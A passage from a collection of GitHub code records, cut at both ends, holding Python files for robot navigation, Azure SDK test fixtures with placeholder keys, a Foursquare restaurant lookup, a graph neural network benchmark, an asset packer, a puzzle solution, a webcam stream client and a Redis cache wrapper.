flag_2==0:\n\t\t\t\t\n\t\t\t\tprint(\"\\033[1;31;40m STOP MODALITY 1 \\033[0;37;40m \\n\")\n\t\t\t\tflag = 1\n\t\t\t\n\t\t\t# Idle state the node will get to once the robot gets stopped by the user.\n\t\t\tif flag == 0 and flag_2==1:\n\t\t\t\t\n\t\t\t\t# Flag needed to know if the goal is reached or not\n\t\t\t\tif flag_goal==1:\n\t\t\t\t\t# If the goal has already been reached, there is nothing to cancel.
\n\t\t\t\t\tprint(\"\\033[1;31;40m STOP MODALITY 1 \"+st+\"\\033[0;37;40m\")\n\t\t\t\t\tflag = 1\n\t\t\t\t\tflag_2 = 0\n\t\t\t\t\tflag_goal = 0\n\t\t\t\n\t\t\t\telse:\n\t\t\t\t\t# If the goal was not reached (the user switched modality or the time-out expired), cancel it.\n\t\t\t\t\tprint(\"\\033[1;31;40m GOAL CANCELED, STOP MODALITY 1 \"+st+\"\\033[0;37;40m\")\n\t\t\t\t\tclient.cancel_goal()\n\t\t\t\t\tflag = 1\n\t\t\t\t\tflag_2 = 0\n\t\t\t\t\n\t\t\n\t\t# Print of the current position\n\t\tif(i%10==0):\n\t\t\n\t\t\tprint(\"\\033[1;37;40m coordinates \\033[0;37;40m: \\033[1;33;40m X:\\033[0;37;40m \"+ str(position_.x)+\"\\033[1;33;40m Y: \\033[0;37;40m\" + str(position_.y), end = '\\r')\n\t\ti=i+1\n\t\trate.sleep()\t# Sleep inside the loop so it actually runs at the chosen rate.\n \n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"Fabioconti99/RT1_Assignment_3","sub_path":"final_assignment/scripts/go_to_desired_pos.py","file_name":"go_to_desired_pos.py","file_ext":"py","file_size_in_byte":8462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
{"seq_id":"3556913012","text":"\nimport os\nimport functools\nfrom devtools_testutils import PowerShellPreparer, AzureMgmtPreparer\nfrom azure.core.credentials import AzureKeyCredential\n\nENABLE_LOGGER = os.getenv('ENABLE_LOGGER', \"False\")\nREGION = os.getenv('FORMRECOGNIZER_LOCATION', None)\n\n\nFormRecognizerPreparer = functools.partial(\n    PowerShellPreparer,\n    'formrecognizer',\n    formrecognizer_test_endpoint=\"https://fakeendpoint.cognitiveservices.azure.com\",\n    formrecognizer_test_api_key=\"fakeZmFrZV9hY29jdW50X2tleQ==\",\n    formrecognizer_storage_container_sas_url=\"https://blob_sas_url\",\n    formrecognizer_testing_data_container_sas_url=\"https://blob_sas_url\",\n    formrecognizer_multipage_storage_container_sas_url=\"https://blob_sas_url\",\n    formrecognizer_multipage_storage_container_sas_url_2=\"https://blob_sas_url\",\n    formrecognizer_selection_mark_storage_container_sas_url=\"https://blob_sas_url\",\n    formrecognizer_table_variable_rows_container_sas_url=\"https://blob_sas_url\",\n    formrecognizer_table_fixed_rows_container_sas_url=\"https://blob_sas_url\",\n    formrecognizer_storage_container_sas_url_v2=\"https://blob_sas_url\",\n    formrecognizer_multipage_storage_container_sas_url_v2=\"https://blob_sas_url\",\n    formrecognizer_multipage_storage_container_sas_url_2_v2=\"https://blob_sas_url\",\n    formrecognizer_selection_mark_storage_container_sas_url_v2=\"https://blob_sas_url\",\n    formrecognizer_table_variable_rows_container_sas_url_v2=\"https://blob_sas_url\",\n    formrecognizer_table_fixed_rows_container_sas_url_v2=\"https://blob_sas_url\",\n    formrecognizer_training_data_classifier=\"https://blob_sas_url\",\n    formrecognizer_resource_id=\"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rgname/providers/Microsoft.CognitiveServices/accounts/formrecognizername\",\n    formrecognizer_region=\"region\"\n)\n\n\nclass GlobalClientPreparer(AzureMgmtPreparer):\n    def __init__(self, client_cls, client_kwargs={}, **kwargs):\n        super(GlobalClientPreparer, self).__init__(\n            name_prefix='',\n            random_name_length=42\n        )\n        self.client_kwargs = client_kwargs\n        self.client_cls = client_cls\n\n    def create_resource(self, name, **kwargs):\n        if self.is_live:\n            form_recognizer_account = os.environ[\"FORMRECOGNIZER_TEST_ENDPOINT\"]\n            form_recognizer_account_key = os.environ[\"FORMRECOGNIZER_TEST_API_KEY\"]\n            polling_interval = 5\n        else:\n            form_recognizer_account = \"https://fakeendpoint.cognitiveservices.azure.com\"\n            
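# (playback mode) the endpoint above and the key below are canned placeholders,\n            # not real credentials; polling_interval=0 keeps recorded test runs fast\n            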
form_recognizer_account_key = \"fakeZmFrZV9hY29jdW50X2tleQ==\"\n polling_interval = 0\n\n client = self.client_cls(\n form_recognizer_account,\n AzureKeyCredential(form_recognizer_account_key),\n polling_interval=polling_interval,\n logging_enable=True if ENABLE_LOGGER == \"True\" else False,\n **self.client_kwargs\n )\n kwargs.update({\"client\": client})\n return kwargs\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/formrecognizer/azure-ai-formrecognizer/tests/preparers.py","file_name":"preparers.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"28021696427","text":"from geocode import getGeocodeLocation\nimport json\nimport httplib2\n\nimport sys\nimport codecs\n#sys.stdout = codecs.getwriter('utf8')(sys.stdout)\n#sys.stderr = codecs.getwriter('utf8')(sys.stderr)\n\n# Use these once you register a FS developer app (another step after FS developer signup)\n#foursquare_client_id = \"PASTE_YOUR_ID_HERE\"\n#foursquare_client_secret = \"YOUR_SECRET_HERE\"\n\ndef findARestaurant(mealType,location):\n\t#1. Use getGeocodeLocation to get the latitude and longitude coordinates of the location string.\n\tlat, lng = getGeocodeLocation(location)\n\n\t#2. Use foursquare API to find a nearby restaurant with the latitude, longitude, and mealType strings.\n\t#HINT: format for url will be something like https://api.foursquare.com/v2/venues/search?client_id=CLIENT_ID&client_secret=CLIENT_SECRET&v=20130815&ll=40.7,-74&query=sushi\n\tfoursquare_token = \"TOKEN_ID\" \t# see example in FS docs, not to be used in production code\n\tfoursquare_v = \"V_ID\" \t\t\t\t\t# sample issued as YYYYMMDD date, not to be used in production code\n\tfoursquare_ll = \"%s,%s\" % (lat, lng)\n\tfoursquare_url = \"https://api.foursquare.com/v2/venues/explore?oauth_token=%s&v=%s&query=%s&ll=%s\" % (foursquare_token, foursquare_v, mealType, foursquare_ll)\n\th = httplib2.Http()\n\tresponse, body = h.request(foursquare_url, \"GET\")\n\tdata = json.loads(body)\n\t\n\tif not data['response']['groups']:\n\t\treturn None\n\n\t#3. Grab the first restaurant\n\trestaurant_name = data['response']['groups'][0]['items'][0]['venue']['name']\n\trestaurant_id = data['response']['groups'][0]['items'][0]['venue']['id']\n\t#4. Get a 300x300 picture of the restaurant using the venue_id (you can change this by altering the 300x300 value in the URL or replacing it with 'orginal' to get the original picture\n\timg_dimensions = (300, 300)\n\t\n\t# not stated in instructor comments but in quiz answer - format the address\n\taddress =\"\"\n\tfor line in data['response']['groups'][0]['items'][0]['venue']['location']['formattedAddress']:\n\t\taddress += \", %s\" % line\n\n\t#5. Grab the first image\n\ttry:\n\t\timg_url = \"https://api.foursquare.com/v2/venues/%s/photos?oauth_token=%s&v=%s\" % (restaurant_id, foursquare_token, foursquare_v)\n\t\timg_data = json.loads(h.request(img_url, \"GET\")[1]) \t# JSONify the body, returned at index 1\n\t\t# FS API\n\t\timg_src = img_data['response']['photos']['items'][0]['prefix'] + \"%sx%s\" % (img_dimensions[0], img_dimensions[1]) + img_data['response']['photos']['items'][0]['suffix']\n\t\n\t#6. If no image is available, insert default a image url\n\texcept:\n\t\timg_src = \"https://placebear.com/%s/%s\" % (img_dimensions[0], img_dimensions[1])\n\t\n\t#7. 
Return a dictionary containing the restaurant name, address, and image url\n\trestaurant = {'name': restaurant_name, 'id': restaurant_id, 'address': address, 'img': img_src}\n\tprint(restaurant)\n\treturn restaurant\n\nif __name__ == '__main__':\n\tfindARestaurant(\"Pizza\", \"Tokyo, Japan\")\n\tfindARestaurant(\"Tacos\", \"Jakarta, Indonesia\")\n\tfindARestaurant(\"Tapas\", \"Maputo, Mozambique\")\n\tfindARestaurant(\"Falafel\", \"Cairo, Egypt\")\n\tfindARestaurant(\"Spaghetti\", \"New Delhi, India\")\n\tfindARestaurant(\"Cappuccino\", \"Geneva, Switzerland\")\n\tfindARestaurant(\"Sushi\", \"Los Angeles, California\")\n\tfindARestaurant(\"Steak\", \"La Paz, Bolivia\")\n\tfindARestaurant(\"Gyros\", \"Sydney Australia\")","repo_name":"Botmasher/udacity-restful-apis","sub_path":"2-exercises/11-mashup/find_restaurant.py","file_name":"find_restaurant.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71586963681","text":"import dgl\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom dgl.nn.pytorch import GraphConv\n\nfrom .. import utils\n\n\nclass GCN(nn.Module):\n def __init__(\n self, in_feats, n_hidden, n_classes, n_layers, activation, dropout\n ):\n super(GCN, self).__init__()\n self.layers = nn.ModuleList()\n # input layer\n self.layers.append(GraphConv(in_feats, n_hidden, activation=activation))\n # hidden layers\n for i in range(n_layers - 1):\n self.layers.append(\n GraphConv(n_hidden, n_hidden, activation=activation)\n )\n # output layer\n self.layers.append(GraphConv(n_hidden, n_classes))\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, g, features):\n h = features\n for i, layer in enumerate(self.layers):\n if i != 0:\n h = self.dropout(h)\n h = layer(g, h)\n return h\n\n\ndef evaluate(model, g, features, labels, mask):\n model.eval()\n with torch.no_grad():\n logits = model(g, features)\n logits = logits[mask]\n labels = labels[mask]\n _, indices = torch.max(logits, dim=1)\n correct = torch.sum(indices == labels)\n return correct.item() * 1.0 / len(labels) * 100\n\n\n@utils.benchmark(\"acc\")\n@utils.parametrize(\"data\", [\"cora\", \"pubmed\"])\ndef track_acc(data):\n data = utils.process_data(data)\n device = utils.get_bench_device()\n\n g = data[0].to(device).int()\n\n features = g.ndata[\"feat\"]\n labels = g.ndata[\"label\"]\n train_mask = g.ndata[\"train_mask\"]\n val_mask = g.ndata[\"val_mask\"]\n test_mask = g.ndata[\"test_mask\"]\n\n in_feats = features.shape[1]\n n_classes = data.num_classes\n\n g = dgl.remove_self_loop(g)\n g = dgl.add_self_loop(g)\n\n # normalization\n degs = g.in_degrees().float()\n norm = torch.pow(degs, -0.5)\n norm[torch.isinf(norm)] = 0\n g.ndata[\"norm\"] = norm.unsqueeze(1)\n\n # create GCN model\n model = GCN(in_feats, 16, n_classes, 1, F.relu, 0.5)\n loss_fcn = torch.nn.CrossEntropyLoss()\n\n model = model.to(device)\n model.train()\n\n # optimizer\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-2, weight_decay=5e-4)\n for epoch in range(200):\n logits = model(g, features)\n loss = loss_fcn(logits[train_mask], labels[train_mask])\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n acc = evaluate(model, g, features, labels, test_mask)\n return 
acc\n","repo_name":"dmlc/dgl","sub_path":"benchmarks/benchmarks/model_acc/bench_gcn.py","file_name":"bench_gcn.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":12455,"dataset":"github-code","pt":"54"} +{"seq_id":"73479270243","text":"from enum import Enum\nimport datetime\nimport glob\nimport json\nimport os\nimport sys\nimport zipfile\n\n#os.chdir(sys.path[0])\n\n# Cook vars\nmanifest_ext = '.amf'\nassets_root_dir = ''\ncooked_path = ''\n\nmanifests = []\nassets_in_manifests = []\nassets_not_on_fs = []\nassets_in_cooked = []\nassets_only_in_cooked = []\nassets_not_in_cooked = []\nassets_to_cook = []\n\nasset_type_map = {}\nasset_type_map['textures'] = 'Texture'\nasset_type_map['sounds'] = 'Sound'\nasset_type_map['fonts'] = 'Font'\nasset_type_map['texts'] = 'Text'\n\nclass Mode(Enum):\n\tAnalyse = 0\n\tCook = 1\n\nmode = Mode.Analyse\ncooked_exists = False\nbackup_path = ''\n\nclass Asset:\n\tdef __init__(self, _type, path, _id):\n\t\tself.type = _type\n\t\tself.path = path\n\t\tself.id = _id\n\t\tself.bytes = os.path.getsize(self.path)\n\tdef __eq__(self, other):\n\t\tif isinstance(other, Asset):\n\t\t\treturn self.id == other.id\n\tdef __hash__(self):\n\t\treturn hash(self.id)\n\nlog_str = ''\n\n# Utility\ndef log(_str):\n\tglobal log_str\n\tlog_str += (_str + '\\n')\n\tprint(_str)\n\ndef log_dashes(_str = ''):\n\tlog_dash_count = 80\n\tlog(' ' + ('-' * log_dash_count))\n\tif _str:\n\t\tlog(' ' + _str)\n\t\tlog(' ' + ('-' * log_dash_count))\n\ndef sizeof_fmt(num, suffix='B'):\n\tfor unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:\n\t\tif abs(num) < 1024.0:\n\t\t\treturn '%3.1f%s%s' % (num, unit, suffix)\n\t\tnum /= 1024.0\n\treturn '%.1f%s%s' % (num, 'Yi', suffix)\n\n# Log Functions\ndef log_paths(paths, header = ''):\n\tif (header):\n\t\tlog_dashes('\\t\\t' + header)\n\ti = 0\n\tcolumn_width = 0\n\tfor path in paths:\n\t\tif (len(path) > column_width):\n\t\t\tcolumn_width = len(path)\n\tcolumn_width += 5\n\tfor path in paths:\n\t\ti += 1\n\t\tpath_text = path.ljust(column_width)\n\t\tindex_text = (str(i) + '.').ljust(4)\n\t\tlog('\\t' + index_text + path_text)\n\tlog(' ')\n\t\t\t\ndef log_assets_if_not_empty(_type, assets, do_print_size, bPrint_id = False):\n\ttotal_size = 0\n\tif (assets):\n\t\tlog_dashes('\\t\\t' + _type)\n\t\ti = 0\n\t\tcolumn_width = 0\n\t\tfor asset in assets:\n\t\t\tif (len(asset.path) > column_width):\n\t\t\t\tcolumn_width = len(asset.path)\n\t\tcolumn_width += 5\n\t\tfor asset in assets:\n\t\t\ti += 1\n\t\t\ttotal_size += asset.bytes\n\t\t\tpath_text = asset.id.ljust(column_width) if bPrint_id else asset.path.ljust(column_width)\n\t\t\tsize_text = sizeof_fmt(asset.bytes)\n\t\t\tindex_text = (str(i) + '.').ljust(5)\n\t\t\tif (do_print_size):\n\t\t\t\tlog('\\t' + index_text + path_text + size_text)\n\t\t\telse:\n\t\t\t\tlog('\\t' + index_text + path_text)\n\t\tif (do_print_size):\n\t\t\tlog(('\\tTotal: ').ljust(column_width + 6) + sizeof_fmt(total_size))\n\t\tlog(' ')\n\treturn total_size\n\ndef log_asset_group_by_type(assets, do_print_size = True):\n\tfonts = []\n\tsounds = []\n\ttexts = []\n\ttextures = []\n\tfor asset in assets:\n\t\tif (asset.type == 'Font'):\n\t\t\tfonts.append(asset)\n\t\telif (asset.type == 'Sound'):\n\t\t\tsounds.append(asset)\n\t\telif (asset.type == 'Text'):\n\t\t\ttexts.append(asset)\n\t\telse:\n\t\t\ttextures.append(asset)\n\ttotal_size = 0\n\ttotal_size += log_assets_if_not_empty('FONTS', fonts, do_print_size)\n\ttotal_size += log_assets_if_not_empty('SOUNDS', sounds, 
do_print_size)\n\ttotal_size += log_assets_if_not_empty('TEXTS', texts, do_print_size)\n\ttotal_size += log_assets_if_not_empty('TEXTURES', textures, do_print_size)\n\treturn total_size\n\ndef log_asset_flat(assets, do_print_size = True, bPrint_id = False):\n\treturn log_assets_if_not_empty('ASSETS', assets, do_print_size, bPrint_id)\n\ndef get_sizeof_file(path):\n\treturn ' [' + sizeof_fmt(os.path.getsize(path)) + ']'\n\n# Args\ndef process_args():\n\tglobal assets_root_dir, cooked_path, mode\n\tscript_path_set = False\n\tassets_root_set = False\n\tcooked_path_set = False\n\tfor arg in sys.argv:\n\t\tif (arg == '--cook' or arg == '-c'):\n\t\t\tmode = Mode.Cook\n\t\telif not script_path_set:\n\t\t\tscript_path_set = True\n\t\telif not assets_root_set:\n\t\t\tassets_root_dir = arg\n\t\t\tassets_root_set = True\n\t\telif not cooked_path_set:\n\t\t\tcooked_path = arg\n\t\t\tcooked_path_set = True\n\tif not cooked_path_set or not assets_root_set:\n\t\tprint('Usage: <relative_manifest_path> <relative_cooked_path> [-c]')\n\t\tsys.exit()\n\n# Core\ndef init():\n\tglobal cooked_exists, backup_path\n\tcooked_exists = os.path.isfile(cooked_path)\n\tif cooked_exists:\n\t\tbackup_path = cooked_path + '.bak'\n\tlog('')\n\tcw = 17\n\tmanifest_names = []\n\tfor filename in glob.glob(assets_root_dir + '/*' + manifest_ext):\n\t\tmanifests.append(filename)\n\t\tmanifest_names.append(os.path.basename(filename))\n\tif not manifests:\n\t\tlog (' ERROR! No manifests found in [' + assets_root_dir + ']')\n\t\treturn False\n\tlog((' Manifests:').ljust(cw) + ': ' + (', '.join(manifest_names)))\n\tif (mode == Mode.Analyse):\n\t\tif (cooked_exists):\n\t\t\tlog((' Analysed').ljust(cw) + ': ' + cooked_path)\n\t\telse:\n\t\t\tlog((' Cook Target').ljust(cw) + ': ' + cooked_path)\n\telif (mode == Mode.Cook):\n\t\tif (cooked_exists):\n\t\t\tlog((' Backup').ljust(cw) + ': ' + backup_path)\n\t\tlog((' Cooking').ljust(cw) + ': ' + cooked_path)\n\treturn True\n\ndef load_asset_manifest(manifest_path):\n\tmanifest_name = os.path.basename(manifest_path)\n\tassets_in_manifest = []\n\twith open(manifest_path, 'r') as file:\n\t\tloaded_manifest = json.loads(file.read())\n\t\ta_types = ['textures', 'fonts', 'sounds', 'texts']\n\t\tfor a_type in a_types:\n\t\t\tif a_type in loaded_manifest:\n\t\t\t\tfor asset_id in loaded_manifest[a_type]:\n\t\t\t\t\tasset_path = assets_root_dir + '/' + asset_id\n\t\t\t\t\tif (os.path.isfile(asset_path)):\n\t\t\t\t\t\tassets_in_manifest.append(Asset(asset_type_map[a_type], asset_path, asset_id))\n\t\t\t\t\telse:\n\t\t\t\t\t\tassets_not_on_fs.append(asset_path)\n\tasset_set_ids = ['textureSets', 'soundSets']\n\tfor asset_set_id in asset_set_ids:\n\t\ta_type = asset_set_id.replace('Set', '')\n\t\tif asset_set_id in loaded_manifest:\n\t\t\tfor asset_set in loaded_manifest[asset_set_id]:\n\t\t\t\tcount = asset_set['count']\n\t\t\t\tfor i in range(0, count):\n\t\t\t\t\tfilename = str(i).zfill(2)\n\t\t\t\t\tpath_prefix = asset_set['pathPrefix'] + '/' if 'pathPrefix' in asset_set else ''\n\t\t\t\t\tasset_prefix = asset_set['assetPrefix'] if 'assetPrefix' in asset_set else ''\n\t\t\t\t\tasset_suffix = asset_set['assetSuffix'] if 'assetSuffix' in asset_set else ''\n\t\t\t\t\tasset_id = path_prefix + asset_prefix + filename + asset_suffix\n\t\t\t\t\tasset_path = assets_root_dir + '/' + asset_id\n\t\t\t\t\tif (os.path.isfile(asset_path)):\n\t\t\t\t\t\tassets_in_manifest.append(Asset(asset_type_map[a_type], asset_path, asset_id))\n\t\t\t\t\telse:\n\t\t\t\t\t\tassets_not_on_fs.append(asset_path)\n\t\tif 
(os.path.isfile(cooked_path)):\n\t\twith zipfile.ZipFile(cooked_path, 'r') as archive:\n\t\t\tfor asset in assets_in_manifest:\n\t\t\t\tif asset.id in archive.namelist():\n\t\t\t\t\tassets_in_cooked.append(asset)\n\t\t\t\telse:\n\t\t\t\t\tassets_not_in_cooked.append(asset)\n\telse:\n\t\tassets_not_in_cooked.extend(assets_in_manifest)\n\tassets_to_cook.append(Asset('Manifest', manifest_path, manifest_name))\n\tassets_in_manifests.extend(assets_in_manifest)\n\ndef log_summary():\n\t# Manifest Crawl\n\tlog(' \\n\\t\\t\\tASSETS IN MANIFEST(s)')\n\ttotal = log_asset_group_by_type(assets_in_manifests)\n\tlog('\\tSum Total: ' + sizeof_fmt(total))\n\t# Missing files\n\tif (assets_not_on_fs):\n\t\tlog(' ')\n\t\tlog_paths(assets_not_on_fs, ' ERROR: ASSETS MISSING FROM FILESYSTEM!')\n\t# Orphaned\n\tif (assets_only_in_cooked):\n\t\tlog('')\n\t\tlog_paths(assets_only_in_cooked, ' ORPHANED ASSETS (will no longer be in ' + cooked_path + ')')\n\t# Cook List\n\tif mode == Mode.Analyse:\n\t\tif assets_in_cooked:\n\t\t\tif (cooked_exists and assets_not_in_cooked):\n\t\t\t\tlog(' \\n\\t\\t\\tNEW ASSETS')\n\t\t\t\tlog_asset_group_by_type(assets_not_in_cooked)\n\t\t\tlog(' \\n\\t\\t\\tEXISTING ASSETS (will be overwritten)')\n\t\t\tlog_asset_group_by_type(assets_in_cooked, False)\n\t\tlog(' \\n\\t\\t\\tASSETS TO COOK')\n\telse:\n\t\tlog(' \\n\\t\\t\\tASSETS COOKED')\n\tlog_asset_flat(assets_to_cook, True, True)\n\ndef pre_cook():\n\tglobal assets_to_cook, assets_in_manifests, assets_in_cooked, assets_not_in_cooked, cooked_exists\n\tif cooked_exists:\n\t\twith zipfile.ZipFile(cooked_path, 'r') as archive:\n\t\t\tfor asset_id in archive.namelist():\n\t\t\t\tif (asset_id.endswith('/') or asset_id.endswith('\\\\')):\n\t\t\t\t\tcontinue\n\t\t\t\tfound = False\n\t\t\t\tfor asset in assets_in_manifests:\n\t\t\t\t\tif (asset_id == asset.id):\n\t\t\t\t\t\tfound = True\n\t\t\t\t\t\tbreak\n\t\t\t\tif (not found) and (manifest_ext not in asset_id):\n\t\t\t\t\tassets_only_in_cooked.append(asset_id)\n\tassets_in_manifests = list(set(assets_in_manifests))\n\tassets_in_manifests.sort(key = lambda x: x.id)\n\tassets_in_manifests.sort(key = lambda x: x.type)\n\tassets_in_cooked = list(set(assets_in_cooked))\n\tassets_in_cooked.sort(key = lambda x: x.id)\n\tassets_in_cooked.sort(key = lambda x: x.type)\n\tassets_not_in_cooked = list(set(assets_not_in_cooked))\n\tassets_not_in_cooked.sort(key = lambda x: x.id)\n\tassets_not_in_cooked.sort(key = lambda x: x.type)\n\tassets_to_cook.extend(assets_in_manifests)\n\tassets_to_cook = list(set(assets_to_cook))\n\tassets_to_cook.sort(key = lambda x: x.id)\n\tassets_to_cook.sort(key = lambda x: x.type)\n\ndef cook():\n\tif cooked_exists:\n\t\tif (os.path.isfile(backup_path)):\n\t\t\tos.remove(backup_path)\n\t\tos.rename(cooked_path, backup_path)\n\twith zipfile.ZipFile(cooked_path, 'w', zipfile.ZIP_DEFLATED, True) as zipF:\n\t\tcount = 0\n\t\tlog('')\n\t\tfor asset in assets_to_cook:\n\t\t\tcount += 1\n\t\t\tzipF.write(asset.path, asset.id)\n\t\t\tlog((' ' + str(count) + '. ').ljust(7) + ('[' + sizeof_fmt(asset.bytes) + ']').ljust(13) + asset.id)\n\t\tlog('')\n\ndef call():\n\tglobal mode\n\tmode = Mode.Cook\n\treturn run()\n\ndef run():\n\tif not init():\n\t\treturn False\n\tfor manifest in manifests:\n\t\tload_asset_manifest(manifest)\n\tpre_cook()\n\tif (assets_not_on_fs):\n\t\tif (mode == Mode.Analyse):\n\t\t\tlog('\\n ERROR: Invalid manifest entries / missing files! 
Attempt to cook will fail!')\n\t\telse:\n\t\t\tlog('\\n ERROR: Invalid manifest entries / missing files! Cook aborted!')\n\t\treturn False\n\tif (mode == Mode.Cook):\n\t\tcook()\n\t\tlog((' Cook Completed').ljust(20) + ': ' + cooked_path + get_sizeof_file(cooked_path))\n\t\tif (backup_path):\n\t\t\tlog((' Back up').ljust(20) + ': ' + backup_path + get_sizeof_file(backup_path))\n\telse:\n\t\tlog_summary()\n\t\tif (cooked_exists):\n\t\t\tlog((' Analysed').ljust(20) + ': ' + cooked_path + get_sizeof_file(cooked_path))\n\t\tsuffix = ' '\n\t\tif (os.path.isfile(cooked_path)):\n\t\t\tsuffix = ' and overwrite '\n\t\tprint('\\n Analysis complete. Run again with -c (--cook) to generate' + suffix + cooked_path)\n\treturn True\n\nif (__name__ == '__main__'):\n\tprocess_args()\n\trun()\n","repo_name":"karnkaul/LittleEngine","sub_path":"Tools/asset_cooker.py","file_name":"asset_cooker.py","file_ext":"py","file_size_in_byte":10132,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"54"} +{"seq_id":"27581744171","text":"path = 'Advent_of_Code/2017/puzzle_input/06.txt'\n\nwith open(path) as f:\n    blocks = [int(x) for x in f.read().split()]\n    \nvisited = dict()\ncycles = 0\nloop_detected = False\n\nwhile not loop_detected:\n    visited[tuple(blocks)] = cycles\n    cycles += 1\n\n    qty = max(blocks)\n    pos = blocks.index(qty)\n    blocks[pos] -= qty\n    for i in range(qty):\n        blocks[(pos + 1 + i) % len(blocks)] += 1\n\n    if tuple(blocks) in visited:\n        loop_detected = cycles\n\nloop_size = loop_detected - visited[tuple(blocks)]\n\nprint(f'Part 1: {loop_detected}')\nprint(f'Part 2: {loop_size}')","repo_name":"mgtezak/Advent_of_Code","sub_path":"2017/Day_06.py","file_name":"Day_06.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4762447272","text":"from twill.errors import TwillAssertionError\nfrom agilo.test import Usernames\n\nfrom agilo.test.functional import AgiloFunctionalTestCase\nfrom trac.tests.functional import tc\n\n\nclass TestBugReporting(AgiloFunctionalTestCase):\n    \"\"\" Test that when an exception occurs in the Agilo code\n    the bug reporting system uses the Agilo bug tracking system\n    for reporting the bug instead of the default Trac instance\n    \"\"\"\n\n    def should_be_skipped(self):\n        import os\n        return (os.name == 'nt') or self.super()\n\n\n    def runTest(self):\n        self.tester.login_as(Usernames.admin)\n        tc.go(\"backlog/Sprint%20Backlog?bscope=non-existing-sprint\")\n        tc.code(500)\n        tc.find(\"Invalid Sprint name\")\n        try:\n            tc.notfind(\"trac.edgewall.org/newticket\")\n        except TwillAssertionError:\n            raise Exception(\"Found a link to the official trac bug tracking platform\")\n\n        tc.find(\"trac-hacks.org/newticket\")\n\n\nif __name__ == '__main__':\n    from agilo.test.testfinder import run_all_tests\n    run_all_tests(__file__)\n\n","repo_name":"djangsters/agilo","sub_path":"functional_tests/bug_reporting_test.py","file_name":"bug_reporting_test.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73268182881","text":"import cv2\nimport numpy as np\nfrom websocket import create_connection\n\nSERVER_IP = \"172.0.0.1\"\n\ndef display_frame(frame_data):\n    np_arr = np.frombuffer(frame_data, np.uint8)\n    frame = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)\n\n    image = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n    cv2.imshow(\"Webcam Streaming\", image)\n    cv2.waitKey(1)\n\n\ndef 
main():\n    url = f\"ws://{SERVER_IP}:8080/video_feed\"\n    ws = create_connection(url)\n\n    try:\n        while True:\n            ws.send(\"next_frame\")\n            frame_data = ws.recv()\n            display_frame(frame_data)\n    finally:\n        ws.close()\n        cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"alexandremendoncaalvaro/webcam-ip","sub_path":"examples/wsl-webcam-capture-example/get_camera_streaming.py","file_name":"get_camera_streaming.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"}
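A minimal, hedged round-trip sketch of the frame decode step used in the streaming client above; the JPEG bytes are synthesized locally here instead of arriving over the websocket:

import cv2
import numpy as np

frame = np.zeros((48, 64, 3), dtype=np.uint8)     # stand-in for a captured frame
ok, buf = cv2.imencode(".jpg", frame)             # what a server side would send as bytes
assert ok
decoded = cv2.imdecode(np.frombuffer(buf.tobytes(), np.uint8), cv2.IMREAD_COLOR)
gray = cv2.cvtColor(decoded, cv2.COLOR_BGR2GRAY)  # same conversion as display_frame
assert gray.shape == (48, 64)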
+{"seq_id":"20952056253","text":"import logging\nimport pickle\nimport uuid\nfrom collections.abc import MutableMapping\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_cache():\n    \"\"\"Return the cache.\n\n    This method returns an instance of :class:`~_RedisCache` if a Redis server\n    is available, or otherwise an instance of :class:`dict` for an in-memory\n    cache.\n\n    Returns\n    -------\n    cache\n        An instance of :class:`~_RedisCache` if redis-server is available,\n        otherwise a dict.\n\n    \"\"\"\n    try:\n        import redis\n\n        REDIS = True\n    except ImportError as error:\n        logger.debug(str(error))\n        REDIS = False\n    if REDIS:\n        try:\n            # try to connect to server\n            cache = redis.Redis()\n            test_key = str(uuid.uuid4())\n            cache.set(test_key, 0)\n            if cache.get(test_key) != b\"0\":  # Redis stores data as bytes\n                raise RuntimeError(\"Cache access check failed.\")\n            cache.delete(test_key)\n            logger.info(\"Using Redis cache.\")\n            return _RedisCache(cache)\n        except (redis.exceptions.ConnectionError, RuntimeError) as error:\n            logger.debug(str(error))\n    logger.info(\"Redis not available.\")\n    return {}\n\n\nclass _RedisCache(MutableMapping):\n    \"\"\"Redis-based cache.\n\n    Redis restricts the types of data it can handle to bytes, strings, or\n    numbers, and it always returns responses as bytes. The _RedisCache is a\n    :class:`~collections.abc.MutableMapping` that provides a convenient wrapper\n    around instances of :class:`redis.Redis`, handling conversions to and from\n    the appropriate data types.\n    \"\"\"\n\n    def __init__(self, client):\n        self._client = client\n\n    def __setitem__(self, key, value):\n        self._client[key] = pickle.dumps(value)\n\n    def __getitem__(self, key):\n        return pickle.loads(self._client[key])\n\n    def __delitem__(self, key):\n        self._client.delete(key)\n\n    def __contains__(self, key):\n        return key in self._client\n\n    def __iter__(self):\n        for key in self._client.keys():\n            yield key.decode()\n\n    def __len__(self):\n        return len(self._client.keys())\n","repo_name":"glotzerlab/synced_collections","sub_path":"synced_collections/_caching.py","file_name":"_caching.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"15448294729","text":"import 